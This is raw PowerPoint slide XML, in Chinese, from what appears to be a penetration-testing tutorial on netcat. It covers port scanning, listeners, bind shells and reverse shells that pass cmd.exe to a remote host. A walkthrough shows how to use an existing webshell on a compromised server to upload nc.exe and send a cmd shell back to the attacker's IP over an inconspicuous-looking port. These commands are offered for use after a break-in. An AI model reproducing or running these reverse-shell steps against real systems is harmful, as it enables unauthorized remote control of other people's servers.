          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【命令】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>netcat -v -z ip port-port</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【解释】扫描某IP的端口段，返回端口信息详细输出，但扫描速度很慢。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【命令】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>netcat -v -z -u ip  port-port</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【解释】扫描某 IP 的某 UDP 端口段，返回端口信息详细输出，但扫描速度很慢。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【命令】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>netcat -nvv -w2 -z ip port-port</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【解释】扫锚某IP的端口段，连接超时时间为2秒。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757" name="Shape 757"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620183" y="1717650"/>
            <a:ext cx="19431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扫描常用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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9" name="Shape 759"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558694" y="2798233"/>
            <a:ext cx="11887412" cy="4902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500"/>
            </a:pPr>
            <a:r>
              <a:t>【命令】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>netcat -l -p 80</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【解释】开启本机的 TCP 80 端口并监听次端口的上传输的数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【命令】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>netcat -l -v -p 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【解释】开启本机的 TCP 80 端口并将监听到的信息输出到当前 CMD 窗口。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【命令】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>netcat -l -p 80 &gt; log.dat </a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【解释】开启本机的 TCP 80 端口并将监听到的信息输出到 log.dat 日志文件里。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【命令】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>netcat -nvv 192.168.1.1 80</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【解释】连接到192.168.1.101主机的 80端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760" name="Shape 760"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620183" y="1717650"/>
            <a:ext cx="19431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流量处理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="761" name="Shape 761"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515135" y="567167"/>
            <a:ext cx="3568701"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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>常用语法简单介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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3" name="Shape 763"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558694" y="2893532"/>
            <a:ext cx="11887412" cy="353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2500"/>
            </a:pPr>
            <a:r>
              <a:t>【远程运行】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>netcat  -l  -p  1234  -t  -e  ％windir%\system32\cmd.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【本地运行】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>netcat   -nvv  192.168.1.1  1234</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>采用正向连接方式，远程主机（注：假设IP地址为 192.168.1.1）上执行上述命令即为绑定远程主机的 CMD 到1234 端口，当本地主机连接远程主机成功时就会返回给本地主机一个CMD Shell 。</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="764" name="Shape 764"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620183" y="1717650"/>
            <a:ext cx="19431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正向连接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="765" name="Shape 765"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515135" y="567167"/>
            <a:ext cx="3568701"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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>常用语法简单介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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7" name="Shape 767"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558694" y="2893532"/>
            <a:ext cx="11887412" cy="3987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2500"/>
            </a:pPr>
            <a:r>
              <a:t>【本地运行】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>netcat -l –vv -p 1234</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【远程运行】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>netcat -t -e ％windir%\system32\cmd.exe 192.168.1.2 1234</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>采用反向连接方式，先在本地主机运行 nc -l –vv -p 1234 开启1234 端口并监听等待远程主机连接；在远程主机上运行 nc -t -e cmd.exe 192.168.1.2 1234 将远程主机的 CMD 重定向到 IP 地址为 192.168.1.2(即本机) 端口号为1234 的主机上，连接成功后 IP 地址为 192.168.1.2 的主机会得到一个CMDShell。</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="768" name="Shape 768"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620183" y="1717650"/>
            <a:ext cx="19431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反向连接</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="769" name="Shape 769"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="515135" y="567167"/>
            <a:ext cx="3568701"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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>常用语法简单介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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1" name="Shape 771"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491100" y="567167"/>
            <a:ext cx="3616772"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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>NC反弹CMDShell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="772" name="Shape 772"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1320800"/>
            <a:ext cx="11328401" cy="1473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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>在Web渗透中，有时候拿到了webshell，我们经常会执行很多命令进行提权等操作，但当我们要尝试很多命令的时候，使用webshell执行cmd往往没有本地执行方便。因此可以借助Webshell通过NC反弹Cmdshell。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="773" name="Shape 773"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="3149600"/>
            <a:ext cx="1585666"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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>实例演示:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="774" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1470284" y="3881102"/>
            <a:ext cx="10064232" cy="5689416"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="775" name="Shape 775"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2793999" y="3149600"/>
            <a:ext cx="5950100"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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>例如已经得到一只webshell如图</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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7" name="Shape 777"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491100" y="567167"/>
            <a:ext cx="3616772"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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>NC反弹CMDShell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="778" name="Shape 778"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="1460500"/>
            <a:ext cx="11328401" cy="3302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b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>简单看了下，得知：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>1、操作系统版本为Win NT 6.1.7601，那么要么Win7要么Win Server 2008，既然是服务器，后者可能性更大)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>2、目录访问权限：除了C盘不能访问，D、E、F、H盘都能跨目录访问，说明权限还是比较大的，另外很多文件都具有r/w权限</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>3、通过多点Ping测试返回结果，可以认为该网站没有使用CDN加速，即能通过域名轻松得到真实IP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="779" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="579889" y="5056719"/>
            <a:ext cx="11464024" cy="4508579"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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1" name="Shape 781"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491100" y="567167"/>
            <a:ext cx="3616772"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400">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>NC反弹CMDShell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="782" name="Shape 782"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="744559" y="1371600"/>
            <a:ext cx="11083883" cy="1473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b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>通过以上信息，那么思路可以如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>1、上传CMD.EXE到权限大的目录，比如网站根目录就行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>2、通过NC建立反弹得到CMDShell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="783" name="Shape 783"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="744559" y="3289300"/>
            <a:ext cx="11083883" cy="582994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b="1" sz="2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>步骤简单演示：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>1、上传cmd.exe、nc.exe到D盘根目录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>2、通过NC建立反弹得到CMDShell（一般选一个看起来“正常”点的端口）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【本地】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>netcat -l –vv -p 23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>【Shell上】</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t>nc.exe -t -e cmd.exe X.X.X.X 23</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:sym typeface="Helvetica"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:rPr>
              <a:t> 其中X.X.X.X为本机公网IP，实际测试需确保外网能访问本机，必要时需端口映射等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="784" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="905115" y="4439973"/>
            <a:ext cx="10762772" cy="2276235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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6" name="image13.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="444606" y="1998445"/>
            <a:ext cx="12115589" cy="5756710"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="197" name="Shape 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="382746" y="1275446"/>
            <a:ext cx="3273108"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>http://dns.aizhan.com/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="198" name="Shape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279716" y="704849"/>
            <a:ext cx="1472566"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t> 在线查询</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
